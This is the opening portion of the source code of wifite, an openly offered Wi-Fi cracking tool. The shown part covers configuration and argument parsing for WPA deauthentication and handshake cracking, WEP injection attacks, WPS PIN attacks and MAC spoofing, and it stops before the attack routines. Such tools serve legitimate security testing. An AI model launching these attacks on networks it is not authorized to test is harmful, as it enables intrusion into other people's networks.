#!/usr/bin/python # -*- coding: utf-8 -*- """ wifite author: derv82 at gmail author: bwall @botnet_hunter (ballastsec@gmail.com) author: drone @dronesec (ballastsec@gmail.com) Thanks to everyone that contributed to this project. If you helped in the past and want your name here, shoot me an email Licensed under the GNU General Public License Version 2 (GNU GPL v2), available at: http://www.gnu.org/licenses/gpl-2.0.txt (C) 2011 Derv Merkler Ballast Security additions ----------------- - No longer requires to be root to run -cracked - cracked.txt changed to cracked.csv and stored in csv format(easier to read, no \x00s) - Backwards compatibility - Made a run configuration class to handle globals - Added -recrack (shows already cracked APs in the possible targets, otherwise hides them) - Changed the updater to grab files from GitHub and not Google Code - Use argparse to parse command-line arguments - -wepca flag now properly initialized if passed through CLI - parse_csv uses python csv library ----------------- TODO: Restore same command-line switch names from v1 If device already in monitor mode, check for and, if applicable, use macchanger WPS * Mention reaver automatically resumes sessions * Warning about length of time required for WPS attack (*hours*) * Show time since last successful attempt * Percentage of tries/attempts ? * Update code to work with reaver 1.4 ("x" sec/att) WEP: * ability to pause/skip/continue (done, not tested) * Option to capture only IVS packets (uses --output-format ivs,csv) - not compatible on older aircrack-ng's. - Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works - would cut down on size of saved .caps reaver: MONITOR ACTIVITY! - Enter ESSID when executing (?) - Ensure WPS key attempts have begun. - If no attempts can be made, stop attack - During attack, if no attempts are made within X minutes, stop attack & Print - Reaver's output when unable to associate: [!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF) - If failed to associate for x minutes, stop attack (same as no attempts?) MIGHTDO: * WPA - crack (pyrit/cowpatty) (not really important) * Test injection at startup? (skippable via command-line switch) """ # ############ # LIBRARIES # ############# import csv # Exporting and importing cracked aps import os # File management import time # Measuring attack intervals import random # Generating a random MAC address. import errno # Error numbers from sys import argv # Command-line arguments from sys import stdout # Flushing from shutil import copy # Copying .cap files # Executing, communicating with, killing processes from subprocess import Popen, call, PIPE from signal import SIGINT, SIGTERM import re # RegEx, Converting SSID to filename import argparse # arg parsing import urllib # Check for new versions from the repo import abc # abstract base class libraries for attack templates ################################ # GLOBAL VARIABLES IN ALL CAPS # ################################ # Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray # /dev/null, send output from programs so they don't print to screen. DN = open(os.devnull, 'w') ERRLOG = open(os.devnull, 'w') OUTLOG = open(os.devnull, 'w') ################### # DATA STRUCTURES # ################### class CapFile: """ Holds data about an access point's .cap file, including AP's ESSID & BSSID. """ def __init__(self, filename, ssid, bssid): self.filename = filename self.ssid = ssid self.bssid = bssid class Target: """ Holds data for a Target (aka Access Point aka Router) """ def __init__(self, bssid, power, data, channel, encryption, ssid): self.bssid = bssid self.power = power self.data = data self.channel = channel self.encryption = encryption self.ssid = ssid self.wps = False # Default to non-WPS-enabled router. self.key = '' class Client: """ Holds data for a Client (device connected to Access Point/Router) """ def __init__(self, bssid, station, power): self.bssid = bssid self.station = station self.power = power class RunConfiguration: """ Configuration for this rounds of attacks """ def __init__(self): self.REVISION = 87; self.PRINTED_SCANNING = False self.TX_POWER = 0 # Transmit power for wireless interface, 0 uses default power # WPA variables self.WPA_DISABLE = False # Flag to skip WPA handshake capture self.WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake self.WPA_DEAUTH_COUNT = 5 # Count to send deauthentication packets self.WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds) self.WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds) self.WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored # Strip file path separator if needed if self.WPA_HANDSHAKE_DIR != '' and self.WPA_HANDSHAKE_DIR[-1] == os.sep: self.WPA_HANDSHAKE_DIR = self.WPA_HANDSHAKE_DIR[:-1] self.WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks self.WPA_DONT_CRACK = False # Flag to skip cracking of handshakes if os.path.exists('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'): self.WPA_DICTIONARY = '/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt' elif os.path.exists('/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'): self.WPA_DICTIONARY = '/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt' else: self.WPA_DICTIONARY = '' # Various programs to use when checking for a four-way handshake. # True means the program must find a valid handshake in order for wifite to recognize a handshake. # Not finding handshake short circuits result (ALL 'True' programs must find handshake) self.WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th) self.WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate. self.WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast. self.WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2) # WEP variables self.WEP_DISABLE = False # Flag for ignoring WEP networks self.WEP_PPS = 600 # packets per second (Tx rate) self.WEP_TIMEOUT = 600 # Amount of time to give each attack self.WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng self.WEP_CHOPCHOP = True # self.WEP_FRAGMENT = True # self.WEP_CAFFELATTE = True # self.WEP_P0841 = True self.WEP_HIRTE = True self.WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking self.WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure self.WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks. self.WEP_SAVE = False # Save packets. # WPS variables self.WPS_DISABLE = False # Flag to skip WPS scan and attacks self.PIXIE = False self.WPS_FINDINGS = [] # List of (successful) results of WPS attacks self.WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt self.WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0) self.WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely. # Program variables self.SHOW_ALREADY_CRACKED = False # Says whether to show already cracked APs as options to crack self.WIRELESS_IFACE = '' # User-defined interface self.MONITOR_IFACE = '' # User-defined interface already in monitor mode self.TARGET_CHANNEL = 0 # User-defined channel to scan on self.TARGET_ESSID = '' # User-defined ESSID of specific target to attack self.TARGET_BSSID = '' # User-defined BSSID of specific target to attack self.IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode # It's our job to put it out of monitor mode after the attacks self.ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing) self.DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer self.SEND_DEAUTHS = True # Flag for deauthing clients while scanning for acces points self.TARGETS_REMAINING = 0 # Number of access points remaining to attack self.WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects) self.THIS_MAC = '' # The interfaces current MAC address. self.SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets self.CRACKED_TARGETS = [] # List of targets we have already cracked self.ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone* self.ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target self.VERBOSE_APS = True # Print access points as they appear self.CRACKED_TARGETS = self.load_cracked() old_cracked = self.load_old_cracked() if len(old_cracked) > 0: # Merge the results for OC in old_cracked: new = True for NC in self.CRACKED_TARGETS: if OC.bssid == NC.bssid: new = False break # If Target isn't in the other list # Add and save to disk if new: self.save_cracked(OC) def ConfirmRunningAsRoot(self): if os.getuid() != 0: print R + ' [!]' + O + ' ERROR:' + G + ' wifite' + O + ' must be run as ' + R + 'root' + W print R + ' [!]' + O + ' login as root (' + W + 'su root' + O + ') or try ' + W + 'sudo ./wifite.py' + W exit(1) def ConfirmCorrectPlatform(self): if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not? print O + ' [!]' + R + ' WARNING:' + G + ' wifite' + W + ' must be run on ' + O + 'linux' + W exit(1) def CreateTempFolder(self): from tempfile import mkdtemp self.temp = mkdtemp(prefix='wifite') if not self.temp.endswith(os.sep): self.temp += os.sep def save_cracked(self, target): """ Saves cracked access point key and info to a file. """ self.CRACKED_TARGETS.append(target) with open('cracked.csv', 'wb') as csvfile: targetwriter = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL) for target in self.CRACKED_TARGETS: targetwriter.writerow([target.bssid, target.encryption, target.ssid, target.key, target.wps]) def load_cracked(self): """ Loads info about cracked access points into list, returns list. """ result = [] if not os.path.exists('cracked.csv'): return result with open('cracked.csv', 'rb') as csvfile: targetreader = csv.reader(csvfile, delimiter=',', quotechar='"') for row in targetreader: t = Target(row[0], 0, 0, 0, row[1], row[2]) t.key = row[3] t.wps = row[4] result.append(t) return result def load_old_cracked(self): """ Loads info about cracked access points into list, returns list. """ result = [] if not os.path.exists('cracked.txt'): return result fin = open('cracked.txt', 'r') lines = fin.read().split('\n') fin.close() for line in lines: fields = line.split(chr(0)) if len(fields) <= 3: continue tar = Target(fields[0], '', '', '', fields[3], fields[1]) tar.key = fields[2] result.append(tar) return result def exit_gracefully(self, code=0): """ We may exit the program at any time. We want to remove the temp folder and any files contained within it. Removes the temp files/folder and exists with error code "code". """ # Remove temp files and folder if os.path.exists(self.temp): for f in os.listdir(self.temp): os.remove(self.temp + f) os.rmdir(self.temp) # Disable monitor mode if enabled by us self.RUN_ENGINE.disable_monitor_mode() # Change MAC address back if spoofed mac_change_back() print GR + " [+]" + W + " quitting" # wifite will now exit" print '' # GTFO exit(code) def handle_args(self): """ Handles command-line arguments, sets global variables. """ set_encrypt = False set_hscheck = False set_wep = False capfile = '' # Filename of .cap file to analyze for handshakes opt_parser = self.build_opt_parser() options = opt_parser.parse_args() try: if not set_encrypt and (options.wpa or options.wep or options.wps): self.WPS_DISABLE = True self.WPA_DISABLE = True self.WEP_DISABLE = True set_encrypt = True if options.recrack: self.SHOW_ALREADY_CRACKED = True print GR + ' [+]' + W + ' including already cracked networks in targets.' if options.wpa: if options.wps: print GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks.' else: print GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks (use ' + G + '-wps' + W + ' for WPS scan)' self.WPA_DISABLE = False if options.wep: print GR + ' [+]' + W + ' targeting ' + G + 'WEP' + W + ' encrypted networks' self.WEP_DISABLE = False if options.wps: print GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.' self.WPS_DISABLE = False if options.pixie: print GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.' print GR + ' [+]' + W + ' using only ' + G + 'WPS Pixie-Dust' + W + ' attack.' self.WPS_DISABLE = False self.WEP_DISABLE = True self.PIXIE = True if options.channel: try: self.TARGET_CHANNEL = int(options.channel) except ValueError: print O + ' [!]' + R + ' invalid channel: ' + O + options.channel + W except IndexError: print O + ' [!]' + R + ' no channel given!' + W else: print GR + ' [+]' + W + ' channel set to %s' % (G + str(self.TARGET_CHANNEL) + W) if options.mac_anon: print GR + ' [+]' + W + ' mac address anonymizing ' + G + 'enabled' + W print O + ' not: only works if device is not already in monitor mode!' + W self.DO_NOT_CHANGE_MAC = False if options.interface: self.WIRELESS_IFACE = options.interface print GR + ' [+]' + W + ' set interface :%s' % (G + self.WIRELESS_IFACE + W) if options.monitor_interface: self.MONITOR_IFACE = options.monitor_interface print GR + ' [+]' + W + ' set interface already in monitor mode :%s' % (G + self.MONITOR_IFACE + W) if options.nodeauth: self.SEND_DEAUTHS = False print GR + ' [+]' + W + ' will not deauthenticate clients while scanning%s' % W if options.essid: try: self.TARGET_ESSID = options.essid except ValueError: print R + ' [!]' + O + ' no ESSID given!' + W else: print GR + ' [+]' + W + ' targeting ESSID "%s"' % (G + self.TARGET_ESSID + W) if options.bssid: try: self.TARGET_BSSID = options.bssid except ValueError: print R + ' [!]' + O + ' no BSSID given!' + W else: print GR + ' [+]' + W + ' targeting BSSID "%s"' % (G + self.TARGET_BSSID + W) if options.showb: self.SHOW_MAC_IN_SCAN = True print GR + ' [+]' + W + ' target MAC address viewing ' + G + 'enabled' + W if options.all: self.ATTACK_ALL_TARGETS = True print GR + ' [+]' + W + ' targeting ' + G + 'all access points' + W if options.power: try: self.ATTACK_MIN_POWER = int(options.power) except ValueError: print R + ' [!]' + O + ' invalid power level: %s' % (R + options.power + W) except IndexError: print R + ' [!]' + O + ' no power level given!' + W else: print GR + ' [+]' + W + ' minimum target power set to %s' % (G + str(self.ATTACK_MIN_POWER) + W) if options.tx: try: self.TX_POWER = int(options.tx) except ValueError: print R + ' [!]' + O + ' invalid TX power leve: %s' % ( R + options.tx + W) except IndexError: print R + ' [!]' + O + ' no TX power level given!' + W else: print GR + ' [+]' + W + ' TX power level set to %s' % (G + str(self.TX_POWER) + W) if options.quiet: self.VERBOSE_APS = False print GR + ' [+]' + W + ' list of APs during scan ' + O + 'disabled' + W if options.check: try: capfile = options.check except IndexError: print R + ' [!]' + O + ' unable to analyze capture file' + W print R + ' [!]' + O + ' no cap file given!\n' + W self.exit_gracefully(1) else: if not os.path.exists(capfile): print R + ' [!]' + O + ' unable to analyze capture file!' + W print R + ' [!]' + O + ' file not found: ' + R + capfile + '\n' + W self.exit_gracefully(1) if options.update: self.upgrade() exit(0) if options.cracked: if len(self.CRACKED_TARGETS) == 0: print R + ' [!]' + O + ' There are no cracked access points saved to ' + R + 'cracked.db\n' + W self.exit_gracefully(1) print GR + ' [+]' + W + ' ' + W + 'previously cracked access points' + W + ':' for victim in self.CRACKED_TARGETS: if victim.wps != False: print ' %s (%s) : "%s" - Pin: %s' % ( C + victim.ssid + W, C + victim.bssid + W, G + victim.key + W, G + victim.wps + W) else: print ' %s (%s) : "%s"' % (C + victim.ssid + W, C + victim.bssid + W, G + victim.key + W) print '' self.exit_gracefully(0) # WPA if not set_hscheck and (options.tshark or options.cowpatty or options.aircrack or options.pyrit): self.WPA_HANDSHAKE_TSHARK = False self.WPA_HANDSHAKE_PYRIT = False self.WPA_HANDSHAKE_COWPATTY = False self.WPA_HANDSHAKE_AIRCRACK = False set_hscheck = True if options.strip: self.WPA_STRIP_HANDSHAKE = True print GR + ' [+]' + W + ' handshake stripping ' + G + 'enabled' + W if options.wpadt: try: self.WPA_DEAUTH_TIMEOUT = int(options.wpadt) except ValueError: print R + ' [!]' + O + ' invalid deauth timeout: %s' % (R + options.wpadt + W) except IndexError: print R + ' [!]' + O + ' no deauth timeout given!' + W else: print GR + ' [+]' + W + ' WPA deauth timeout set to %s' % (G + str(self.WPA_DEAUTH_TIMEOUT) + W) if options.wpat: try: self.WPA_ATTACK_TIMEOUT = int(options.wpat) except ValueError: print R + ' [!]' + O + ' invalid attack timeout: %s' % (R + options.wpat + W) except IndexError: print R + ' [!]' + O + ' no attack timeout given!' + W else: print GR + ' [+]' + W + ' WPA attack timeout set to %s' % (G + str(self.WPA_ATTACK_TIMEOUT) + W) if options.crack: self.WPA_DONT_CRACK = False print GR + ' [+]' + W + ' WPA cracking ' + G + 'enabled' + W if options.dic: try: self.WPA_DICTIONARY = options.dic except IndexError: print R + ' [!]' + O + ' no WPA dictionary given!' else: if os.path.exists(options.dic): print GR + ' [+]' + W + ' WPA dictionary set to %s' % (G + self.WPA_DICTIONARY + W) else: print R + ' [!]' + O + ' WPA dictionary file not found: %s' % (options.dic) else: print R + ' [!]' + O + ' WPA dictionary file not given!' self.exit_gracefully(1) if options.tshark: self.WPA_HANDSHAKE_TSHARK = True print GR + ' [+]' + W + ' tshark handshake verification ' + G + 'enabled' + W if options.pyrit: self.WPA_HANDSHAKE_PYRIT = True print GR + ' [+]' + W + ' pyrit handshake verification ' + G + 'enabled' + W if options.aircrack: self.WPA_HANDSHAKE_AIRCRACK = True print GR + ' [+]' + W + ' aircrack handshake verification ' + G + 'enabled' + W if options.cowpatty: self.WPA_HANDSHAKE_COWPATTY = True print GR + ' [+]' + W + ' cowpatty handshake verification ' + G + 'enabled' + W # WEP if not set_wep and options.chopchop or options.fragment or options.caffeelatte or options.arpreplay \ or options.p0841 or options.hirte: self.WEP_CHOPCHOP = False self.WEP_ARPREPLAY = False self.WEP_CAFFELATTE = False self.WEP_FRAGMENT = False self.WEP_P0841 = False self.WEP_HIRTE = False if options.chopchop: print GR + ' [+]' + W + ' WEP chop-chop attack ' + G + 'enabled' + W self.WEP_CHOPCHOP = True if options.fragment: print GR + ' [+]' + W + ' WEP fragmentation attack ' + G + 'enabled' + W self.WEP_FRAGMENT = True if options.caffeelatte: print GR + ' [+]' + W + ' WEP caffe-latte attack ' + G + 'enabled' + W self.WEP_CAFFELATTE = True if options.arpreplay: print GR + ' [+]' + W + ' WEP arp-replay attack ' + G + 'enabled' + W self.WEP_ARPREPLAY = True if options.p0841: print GR + ' [+]' + W + ' WEP p0841 attack ' + G + 'enabled' + W self.WEP_P0841 = True if options.hirte: print GR + ' [+]' + W + ' WEP hirte attack ' + G + 'enabled' + W self.WEP_HIRTE = True if options.fakeauth: print GR + ' [+]' + W + ' ignoring failed fake-authentication ' + R + 'disabled' + W self.WEP_IGNORE_FAKEAUTH = False if options.wepca: try: self.WEP_CRACK_AT_IVS = int(options.wepca) except ValueError: print R + ' [!]' + O + ' invalid number: %s' % ( R + options.wepca + W ) except IndexError: print R + ' [!]' + O + ' no IV number specified!' + W else: print GR + ' [+]' + W + ' Starting WEP cracking when IV\'s surpass %s' % ( G + str(self.WEP_CRACK_AT_IVS) + W) if options.wept: try: self.WEP_TIMEOUT = int(options.wept) except ValueError: print R + ' [!]' + O + ' invalid timeout: %s' % (R + options.wept + W) except IndexError: print R + ' [!]' + O + ' no timeout given!' + W else: print GR + ' [+]' + W + ' WEP attack timeout set to %s' % ( G + str(self.WEP_TIMEOUT) + " seconds" + W) if options.pps: try: self.WEP_PPS = int(options.pps) except ValueError: print R + ' [!]' + O + ' invalid value: %s' % (R + options.pps + W) except IndexError: print R + ' [!]' + O + ' no value given!' + W else: print GR + ' [+]' + W + ' packets-per-second rate set to %s' % ( G + str(options.pps) + " packets/sec" + W) if options.wepsave: self.WEP_SAVE = True print GR + ' [+]' + W + ' WEP .cap file saving ' + G + 'enabled' + W # WPS if options.wpst: try: self.WPS_TIMEOUT = int(options.wpst) except ValueError: print R + ' [!]' + O + ' invalid timeout: %s' % (R + options.wpst + W) except IndexError: print R + ' [!]' + O + ' no timeout given!' + W else: print GR + ' [+]' + W + ' WPS attack timeout set to %s' % ( G + str(self.WPS_TIMEOUT) + " seconds" + W) if options.wpsratio: try: self.WPS_RATIO_THRESHOLD = float(options.wpsratio) except ValueError: print R + ' [!]' + O + ' invalid percentage: %s' % (R + options.wpsratio + W) except IndexError: print R + ' [!]' + O + ' no ratio given!' + W else: print GR + ' [+]' + W + ' minimum WPS tries/attempts threshold set to %s' % ( G + str(self.WPS_RATIO_THRESHOLD) + "" + W) if options.wpsretry: try: self.WPS_MAX_RETRIES = int(options.wpsretry) except ValueError: print R + ' [!]' + O + ' invalid number: %s' % (R + options.wpsretry + W) except IndexError: print R + ' [!]' + O + ' no number given!' + W else: print GR + ' [+]' + W + ' WPS maximum retries set to %s' % ( G + str(self.WPS_MAX_RETRIES) + " retries" + W) except IndexError: print '\nindexerror\n\n' if capfile != '': self.RUN_ENGINE.analyze_capfile(capfile) print '' def build_opt_parser(self): """ Options are doubled for backwards compatability; will be removed soon and fully moved to GNU-style """ option_parser = argparse.ArgumentParser() # set commands command_group = option_parser.add_argument_group('COMMAND') command_group.add_argument('--check', help='Check capfile [file] for handshakes.', action='store', dest='check') command_group.add_argument('-check', action='store', dest='check', help=argparse.SUPPRESS) command_group.add_argument('--cracked', help='Display previously cracked access points.', action='store_true', dest='cracked') command_group.add_argument('-cracked', help=argparse.SUPPRESS, action='store_true', dest='cracked') command_group.add_argument('--recrack', help='Include already cracked networks in targets.', action='store_true', dest='recrack') command_group.add_argument('-recrack', help=argparse.SUPPRESS, action='store_true', dest='recrack') # set global global_group = option_parser.add_argument_group('GLOBAL') global_group.add_argument('--all', help='Attack all targets.', default=False, action='store_true', dest='all') global_group.add_argument('-all', help=argparse.SUPPRESS, default=False, action='store_true', dest='all') global_group.add_argument('-i', help='Wireless interface for capturing.', action='store', dest='interface') global_group.add_argument('--mac', help='Anonymize MAC address.', action='store_true', default=False, dest='mac_anon') global_group.add_argument('-mac', help=argparse.SUPPRESS, action='store_true', default=False, dest='mac_anon') global_group.add_argument('--mon-iface', help='Interface already in monitor mode.', action='store', dest='monitor_interface') global_group.add_argument('-c', help='Channel to scan for targets.', action='store', dest='channel') global_group.add_argument('-e', help='Target a specific access point by ssid (name).', action='store', dest='essid') global_group.add_argument('-b', help='Target a specific access point by bssid (mac).', action='store', dest='bssid') global_group.add_argument('--showb', help='Display target BSSIDs after scan.', action='store_true', dest='showb') global_group.add_argument('-showb', help=argparse.SUPPRESS, action='store_true', dest='showb') global_group.add_argument('--nodeauth', help='Do not deauthenticate clients while scanning', action='store_true', dest='nodeauth') global_group.add_argument('--power', help='Attacks any targets with signal strength > [pow].', action='store', dest='power') global_group.add_argument('-power', help=argparse.SUPPRESS, action='store', dest='power') global_group.add_argument('--tx', help='Set adapter TX power level.', action='store', dest='tx') global_group.add_argument('-tx', help=argparse.SUPPRESS, action='store', dest='tx') global_group.add_argument('--quiet', help='Do not print list of APs during scan.', action='store_true', dest='quiet') global_group.add_argument('-quiet', help=argparse.SUPPRESS, action='store_true', dest='quiet') global_group.add_argument('--update', help='Check and update Wifite.', default=False, action='store_true', dest='update') global_group.add_argument('-update', help=argparse.SUPPRESS, default=False, action='store_true', dest='update') # set wpa commands wpa_group = option_parser.add_argument_group('WPA') wpa_group.add_argument('--wpa', help='Only target WPA networks (works with --wps --wep).', default=False, action='store_true', dest='wpa') wpa_group.add_argument('-wpa', help=argparse.SUPPRESS, default=False, action='store_true', dest='wpa') wpa_group.add_argument('--wpat', help='Time to wait for WPA attack to complete (seconds).', action='store', dest='wpat') wpa_group.add_argument('-wpat', help=argparse.SUPPRESS, action='store', dest='wpat') wpa_group.add_argument('--wpadt', help='Time to wait between sending deauth packets (seconds).', action='store', dest='wpadt') wpa_group.add_argument('-wpadt', help=argparse.SUPPRESS, action='store', dest='wpadt') wpa_group.add_argument('--strip', help='Strip handshake using tshark or pyrit.', default=False, action='store_true', dest='strip') wpa_group.add_argument('-strip', help=argparse.SUPPRESS, default=False, action='store_true', dest='strip') wpa_group.add_argument('--crack', help='Crack WPA handshakes using [dic] wordlist file.', action='store_true', dest='crack') wpa_group.add_argument('-crack', help=argparse.SUPPRESS, action='store_true', dest='crack') wpa_group.add_argument('--dict', help='Specificy dictionary to use when cracking WPA.', action='store', dest='dic') wpa_group.add_argument('-dict', help=argparse.SUPPRESS, action='store', dest='dic') wpa_group.add_argument('--aircrack', help='Verify handshake using aircrack.', default=False, action='store_true', dest='aircrack') wpa_group.add_argument('-aircrack', help=argparse.SUPPRESS, default=False, action='store_true', dest='aircrack') wpa_group.add_argument('--pyrit', help='Verify handshake using pyrit.', default=False, action='store_true', dest='pyrit') wpa_group.add_argument('-pyrit', help=argparse.SUPPRESS, default=False, action='store_true', dest='pyrit') wpa_group.add_argument('--tshark', help='Verify handshake using tshark.', default=False, action='store_true', dest='tshark') wpa_group.add_argument('-tshark', help=argparse.SUPPRESS, default=False, action='store_true', dest='tshark') wpa_group.add_argument('--cowpatty', help='Verify handshake using cowpatty.', default=False, action='store_true', dest='cowpatty') wpa_group.add_argument('-cowpatty', help=argparse.SUPPRESS, default=False, action='store_true', dest='cowpatty') # set WEP commands wep_group = option_parser.add_argument_group('WEP') wep_group.add_argument('--wep', help='Only target WEP networks.', default=False, action='store_true', dest='wep') wep_group.add_argument('-wep', help=argparse.SUPPRESS, default=False, action='store_true', dest='wep') wep_group.add_argument('--pps', help='Set the number of packets per second to inject.', action='store', dest='pps') wep_group.add_argument('-pps', help=argparse.SUPPRESS, action='store', dest='pps') wep_group.add_argument('--wept', help='Sec to wait for each attack, 0 implies endless.', action='store', dest='wept') wep_group.add_argument('-wept', help=argparse.SUPPRESS, action='store', dest='wept') wep_group.add_argument('--chopchop', help='Use chopchop attack.', default=False, action='store_true', dest='chopchop') wep_group.add_argument('-chopchop', help=argparse.SUPPRESS, default=False, action='store_true', dest='chopchop') wep_group.add_argument('--arpreplay', help='Use arpreplay attack.', default=False, action='store_true', dest='arpreplay') wep_group.add_argument('-arpreplay', help=argparse.SUPPRESS, default=False, action='store_true', dest='arpreplay') wep_group.add_argument('--fragment', help='Use fragmentation attack.', default=False, action='store_true', dest='fragment') wep_group.add_argument('-fragment', help=argparse.SUPPRESS, default=False, action='store_true', dest='fragment') wep_group.add_argument('--caffelatte', help='Use caffe-latte attack.', default=False, action='store_true', dest='caffeelatte') wep_group.add_argument('-caffelatte', help=argparse.SUPPRESS, default=False, action='store_true', dest='caffeelatte') wep_group.add_argument('--p0841', help='Use P0842 attack.', default=False, action='store_true', dest='p0841') wep_group.add_argument('-p0841', help=argparse.SUPPRESS, default=False, action='store_true', dest='p0841') wep_group.add_argument('--hirte', help='Use hirte attack.', default=False, action='store_true', dest='hirte') wep_group.add_argument('-hirte', help=argparse.SUPPRESS, default=False, action='store_true', dest='hirte') wep_group.add_argument('--nofakeauth', help='Stop attack if fake authentication fails.', default=False, action='store_true', dest='fakeauth') wep_group.add_argument('-nofakeauth', help=argparse.SUPPRESS, default=False, action='store_true', dest='fakeauth') wep_group.add_argument('--wepca', help='Start cracking when number of IVs surpass [n].', action='store', dest='wepca') wep_group.add_argument('-wepca', help=argparse.SUPPRESS, action='store', dest='wepca') wep_group.add_argument('--wepsave', help='Save a copy of .cap files to this directory.', default=None, action='store', dest='wepsave') wep_group.add_argument('-wepsave', help=argparse.SUPPRESS, default=None, action='store', dest='wepsave') # set WPS commands wps_group = option_parser.add_argument_group('WPS') wps_group.add_argument('--wps', help='Only target WPS networks.', default=False, action='store_true', dest='wps') wps_group.add_argument('-wps', help=argparse.SUPPRESS, default=False, action='store_true', dest='wps') wps_group.add_argument('--pixie', help='Only use the WPS PixieDust attack', default=False, action='store_true', dest='pixie') wps_group.add_argument('--wpst', help='Max wait for new retry before giving up (0: never).', action='store', dest='wpst') wps_group.add_argument('-wpst', help=argparse.SUPPRESS, action='store', dest='wpst') wps_group.add_argument('--wpsratio', help='Min ratio of successful PIN attempts/total retries.', action='store', dest='wpsratio') wps_group.add_argument('-wpsratio', help=argparse.SUPPRESS, action='store', dest='wpsratio') wps_group.add_argument('--wpsretry', help='Max number of retries for same PIN before giving up.', action='store', dest='wpsretry') wps_group.add_argument('-wpsretry', help=argparse.SUPPRESS, action='store', dest='wpsretry') return option_parser def upgrade(self): """ Checks for new version, prompts to upgrade, then replaces this script with the latest from the repo """ try: print GR + ' [!]' + W + ' upgrading requires an ' + G + 'internet connection' + W print GR + ' [+]' + W + ' checking for latest version...' revision = get_revision() if revision == -1: print R + ' [!]' + O + ' unable to access GitHub' + W elif revision > self.REVISION: print GR + ' [!]' + W + ' a new version is ' + G + 'available!' + W print GR + ' [-]' + W + ' revision: ' + G + str(revision) + W response = raw_input(GR + ' [+]' + W + ' do you want to upgrade to the latest version? (y/n): ') if not response.lower().startswith('y'): print GR + ' [-]' + W + ' upgrading ' + O + 'aborted' + W self.exit_gracefully(0) return # Download script, replace with this one print GR + ' [+] ' + G + 'downloading' + W + ' update...' try: sock = urllib.urlopen('https://github.com/derv82/wifite/raw/master/wifite.py') page = sock.read() except IOError: page = '' if page == '': print R + ' [+] ' + O + 'unable to download latest version' + W self.exit_gracefully(1) # Create/save the new script f = open('wifite_new.py', 'w') f.write(page) f.close() # The filename of the running script this_file = __file__ if this_file.startswith('./'): this_file = this_file[2:] # create/save a shell script that replaces this script with the new one f = open('update_wifite.sh', 'w') f.write('''#!/bin/sh\n rm -rf ''' + this_file + '''\n mv wifite_new.py ''' + this_file + '''\n rm -rf update_wifite.sh\n chmod +x ''' + this_file + '''\n ''') f.close() # Change permissions on the script returncode = call(['chmod', '+x', 'update_wifite.sh']) if returncode != 0: print R + ' [!]' + O + ' permission change returned unexpected code: ' + str(returncode) + W self.exit_gracefully(1) # Run the script returncode = call(['sh', 'update_wifite.sh']) if returncode != 0: print R + ' [!]' + O + ' upgrade script returned unexpected code: ' + str(returncode) + W self.exit_gracefully(1) print GR + ' [+] ' + G + 'updated!' + W + ' type "./' + this_file + '" to run again' else: print GR + ' [-]' + W + ' your copy of wifite is ' + G + 'up to date' + W except KeyboardInterrupt: print R + '\n (^C)' + O + ' wifite upgrade interrupted' + W self.exit_gracefully(0) class RunEngine: def __init__(self, run_config): self.RUN_CONFIG = run_config self.RUN_CONFIG.RUN_ENGINE = self def initial_check(self): """ Ensures required programs are installed. """ airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng'] for air in airs: if program_exists(air): continue print R + ' [!]' + O + ' required program not found: %s' % (R + air + W) print R + ' [!]' + O + ' this program is bundled with the aircrack-ng suite:' + W print R + ' [!]' + O + ' ' + C + 'http://www.aircrack-ng.org/' + W print R + ' [!]' + O + ' or: ' + W + 'sudo apt-get install aircrack-ng\n' + W self.RUN_CONFIG.exit_gracefully(1) if not program_exists('iw'): print R + ' [!]' + O + ' airmon-ng requires the program %s\n' % (R + 'iw' + W) self.RUN_CONFIG.exit_gracefully(1) printed = False # Check reaver if not program_exists('reaver'): printed = True print R + ' [!]' + O + ' the program ' + R + 'reaver' + O + ' is required for WPS attacks' + W print R + ' ' + O + ' available at ' + C + 'http://code.google.com/p/reaver-wps' + W 